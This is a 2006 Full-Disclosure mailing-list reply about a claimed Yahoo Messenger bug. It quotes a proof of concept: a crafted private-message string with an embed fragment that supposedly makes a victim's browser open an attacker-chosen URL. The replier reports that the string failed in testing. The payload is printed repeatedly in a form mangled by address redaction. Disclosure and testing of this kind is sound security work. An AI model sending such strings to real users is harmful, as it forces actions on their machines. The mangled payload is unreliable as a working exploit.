I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees:
s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: ---------------------------------------------<embed
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window?
Cheers
On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote:
Hi,
I found another vulnerability in yahoo messenger that
if you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("
(without quotes) Yahoo messenger open in this case
google.com in the internet explorer of the remote
victim.
Yahoo messenger bug proof of concept:
1. Open messenger and log it.
2. Open a yahoo chat third party like yahelite through
Ymsgr protocol and log it with another account.
3. Send a Pm to the messenger account with this
string: s: helomsg
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
>:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
>:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
4. The remote user will open www.google.com (you can
change)
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space
s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:---------------------------------------------<embed
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Tested in yahoo messenger 7.0/7.5
Regards.
__________________________________________________
Preguntá. Respondé. Descubrí.
Todo lo que querías saber, y lo que ni imaginabas,
está en Yahoo! Respuestas (Beta).
¡Probalo ya!
http://www.yahoo.com.ar/respuestas
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
